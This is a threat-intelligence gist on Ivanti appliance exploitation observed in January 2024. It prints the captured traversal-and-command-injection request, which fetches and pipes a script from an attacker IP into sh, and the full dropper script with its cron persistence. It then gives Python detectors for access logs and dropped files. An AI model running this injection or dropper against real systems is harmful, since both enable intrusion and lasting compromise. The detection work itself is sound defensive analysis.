@kimber99
Created January 22, 2024 17:40
Ivanti exploitation behavior 1/22
first stage: /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f%34%35%2e%31%33%30%2e%32%32%2e%32%31%39%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a
decodes to: /api/v1/totp/user-backup-code/../../license/keys-status/;wget --timeout=20 --no-check-certificate -q -O- https://45.130.22.219/ivanti.js|sh;
The directory index of the hosting server at 45.130.22.219 says "Hacked by voadu".
Scanned on urlscan.io: submitted January 22nd 2024, 3:26:21 am UTC (manual, from JP), scanned from NL.
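An added example (my own code, not from this gist or from Ivanti) that shows how to pick the first-stage request out of web access logs: percent-decode the target, split the path from the injected shell command at the first metacharacter, collapse the `../` segments to see which endpoint the request actually lands on, and pull the stage-two download URL out of the injected command. The log format (combined-log style) and the two benign requests are assumptions constructed for the demo; the first request target is the one captured above.

```python
import re
import urllib.parse

# Constructed sample access-log lines for demonstration (assumed combined-log
# format). The first request target is the one captured in this gist; the
# other two are made-up benign requests for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2024:03:20:11 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f%34%35%2e%31%33%30%2e%32%32%2e%32%31%39%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a HTTP/1.1" 200 512
10.0.0.6 - - [22/Jan/2024:03:21:40 +0000] "GET /api/v1/license/keys-status/ HTTP/1.1" 403 0
10.0.0.7 - - [22/Jan/2024:03:22:05 +0000] "POST /api/v1/totp/user-backup-code/ HTTP/1.1" 200 128
"""

REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SHELL_META_RE = re.compile(r'[;|&`$]')          # first point where the path turns into a command
URL_RE = re.compile(r'https?://[^\s;|&"\']+')    # stage-two download URLs inside the injected command
TARGET_PREFIX = '/api/v1/license/keys-status'   # endpoint the traversal lands on in the captured request


def decode_target(target: str) -> str:
    """Percent-decode until the string stops changing, so double encoding is caught too."""
    prev, cur = None, target
    for _ in range(5):
        if cur == prev:
            break
        prev, cur = cur, urllib.parse.unquote(cur)
    return cur


def normalize_path(path: str) -> str:
    """Collapse '.' and '..' segments the way the backend router would resolve them."""
    parts = []
    for seg in path.split('/'):
        if seg == '..':
            if parts:
                parts.pop()
        elif seg and seg != '.':
            parts.append(seg)
    return '/' + '/'.join(parts)


def analyze_target(target: str) -> dict:
    """Classify one request target as benign, suspicious (traversal or metachar) or exploit."""
    decoded = decode_target(target)
    m = SHELL_META_RE.search(decoded)
    path_part = decoded if m is None else decoded[:m.start()]
    injected = '' if m is None else decoded[m.start():].strip()
    normalized = normalize_path(path_part)
    traversal = '/../' in path_part
    lands_on_target = normalized.startswith(TARGET_PREFIX)
    if traversal and lands_on_target and injected:
        verdict = 'exploit'
    elif traversal or injected:
        verdict = 'suspicious'
    else:
        verdict = 'benign'
    return {
        'decoded': decoded,
        'normalized_path': normalized,
        'injected': injected,
        'urls': URL_RE.findall(injected),
        'verdict': verdict,
    }


def scan_log(text: str) -> list:
    """Run analyze_target over every parseable request line, keeping client IP and method."""
    results = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        r = analyze_target(m.group('target'))
        r['client'] = m.group('client')
        r['method'] = m.group('method')
        results.append(r)
    return results


if __name__ == '__main__':
    for r in scan_log(SAMPLE_LOG):
        print(r['verdict'].upper(), r['client'], r['method'], r['normalized_path'], r['urls'])
```

The split at the first shell metacharacter matters: the injected part contains `https://`, so normalizing the whole decoded string would mangle the path; only the part before `;` is a path. Because the stage-one command uses `wget -O- ... | sh`, nothing from stage one is written to disk, so the access log (or a proxy in front of the appliance) is where this stage shows up.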
ivanti.js:
#!/bin/bash
url='https://45.130.22.219/ivanti'
name1=`date +%s%N`
wget --no-check-certificate ${url} -O /etc/$name1
chmod +x /etc/$name1
echo "*/10 * * * * root /etc/$name1" >> /etc/cron.d/$name1
/etc/$name1
name2=`date +%s%N`
curl -k ${url} -o /etc/$name2
chmod +x /etc/$name2
echo "*/10 * * * * root /etc/$name2" >> /etc/cron.d/$name2
/etc/$name2
name3=`date +%s%N`
wget --no-check-certificate ${url} -O /tmp/$name3
chmod +x /tmp/$name3
(crontab -l ; echo "*/10 * * * * /tmp/$name3") | crontab -
/tmp/$name3
name4=`date +%s%N`
curl -k ${url} -o /var/tmp/$name4
chmod +x /var/tmp/$name4
(crontab -l ; echo "*/10 * * * * /var/tmp/$name4") | crontab -
/var/tmp/$name4
while true
do
chmod +x /etc/$name1
/etc/$name1
sleep 60
chmod +x /etc/$name2
/etc/$name2
sleep 60
chmod +x /tmp/$name3
/tmp/$name3
sleep 60
chmod +x /var/tmp/$name4
/var/tmp/$name4
sleep 60
done
https://45.130.22.219/ivanti - shitty ELF that I'm not gonna poke at (MIME: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped)
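An added example (my own code, not from this gist) of a host-side hunt for what ivanti.js leaves behind: files named with a `date +%s%N` stamp (19 digits) in /etc, /tmp and /var/tmp, every-10-minute entries in /etc/cron.d pointing at such files, and the matching lines the script appends to the user crontab. The scan takes a root directory so it can be run against a mounted image or a constructed tree; `build_demo_tree` and `DEMO_USER_CRONTAB` are constructed stand-ins for a compromised host, not data from a real appliance, and the ELF check only looks at the magic bytes.

```python
import os
import re
import tempfile
from pathlib import Path

# Names from `date +%s%N` are Unix seconds followed by nanoseconds: 19 digits
# for any date in the foreseeable future, so match 18-20 to be safe.
EPOCH_NS_NAME = re.compile(r'^\d{18,20}$')
DROP_DIRS = ('etc', 'tmp', 'var/tmp')
# cron.d lines carry a user field ("root"); user-crontab lines do not.
CRON_LINE = re.compile(r'^\*/10 \* \* \* \*(?: +root)? +(/(?:etc|tmp|var/tmp)/\d{18,20})\s*$')

# Constructed `crontab -l` output after the dropper appended its line; the
# backup job is an assumed benign entry.
DEMO_USER_CRONTAB = """\
0 5 * * * /usr/local/bin/backup.sh
*/10 * * * * /tmp/1705944060987654321
"""


def is_elf(path: Path) -> bool:
    """True if the file starts with the ELF magic; the stage-two payload is a static ELF."""
    try:
        with open(path, 'rb') as fh:
            return fh.read(4) == b'\x7fELF'
    except OSError:
        return False


def find_dropped_binaries(root: Path) -> list:
    """Files in the dropper's three directories whose name is an epoch-nanosecond stamp."""
    hits = []
    for rel in DROP_DIRS:
        base = root / rel
        if not base.is_dir():
            continue
        for p in sorted(base.iterdir()):
            if p.is_file() and EPOCH_NS_NAME.match(p.name):
                hits.append({
                    'path': '/' + p.relative_to(root).as_posix(),
                    'elf': is_elf(p),
                    'executable': os.access(p, os.X_OK),
                })
    return hits


def find_cron_persistence(root: Path, user_crontab: str = '') -> list:
    """Every-10-minute cron entries pointing at a stamp-named file, from cron.d and a crontab dump."""
    hits = []
    cron_d = root / 'etc' / 'cron.d'
    if cron_d.is_dir():
        for f in sorted(cron_d.iterdir()):
            if not f.is_file():
                continue
            for line in f.read_text(errors='replace').splitlines():
                m = CRON_LINE.match(line.strip())
                if m:
                    hits.append({'source': '/' + f.relative_to(root).as_posix(), 'target': m.group(1)})
    for line in user_crontab.splitlines():
        m = CRON_LINE.match(line.strip())
        if m:
            hits.append({'source': 'crontab -l', 'target': m.group(1)})
    return hits


def build_demo_tree() -> Path:
    """Lay out a throwaway root that mimics what ivanti.js leaves behind (constructed, not a real host)."""
    root = Path(tempfile.mkdtemp(prefix='ivanti-hunt-'))
    fake_elf = b'\x7fELF\x02\x01\x01' + b'\x00' * 57   # 64-byte stub with only the ELF magic set
    for rel, name in (('etc', '1705944000123456789'), ('tmp', '1705944060987654321')):
        d = root / rel
        d.mkdir(parents=True, exist_ok=True)
        (d / name).write_bytes(fake_elf)
        (d / name).chmod(0o755)
    cron_d = root / 'etc' / 'cron.d'
    cron_d.mkdir(parents=True, exist_ok=True)
    (cron_d / '1705944000123456789').write_text('*/10 * * * * root /etc/1705944000123456789\n')
    (cron_d / 'sysstat').write_text('5-55/10 * * * * root /usr/lib64/sa/sa1 1 1\n')  # benign decoy
    (root / 'etc' / 'hosts').write_text('127.0.0.1 localhost\n')                        # benign decoy
    return root


if __name__ == '__main__':
    demo = build_demo_tree()
    for b in find_dropped_binaries(demo):
        print('dropped:', b)
    for c in find_cron_persistence(demo, DEMO_USER_CRONTAB):
        print('cron:', c)
```

On a live box you would call `find_dropped_binaries(Path('/'))` and feed `crontab -l` output (for root and any other user the script could have run as) into `find_cron_persistence`; the cron.d file name itself is the same stamp as the binary it launches, which is a second, independent indicator. Remember the script also keeps a foreground loop re-executing the four copies every 60 seconds, so killing the cron entries alone is not enough.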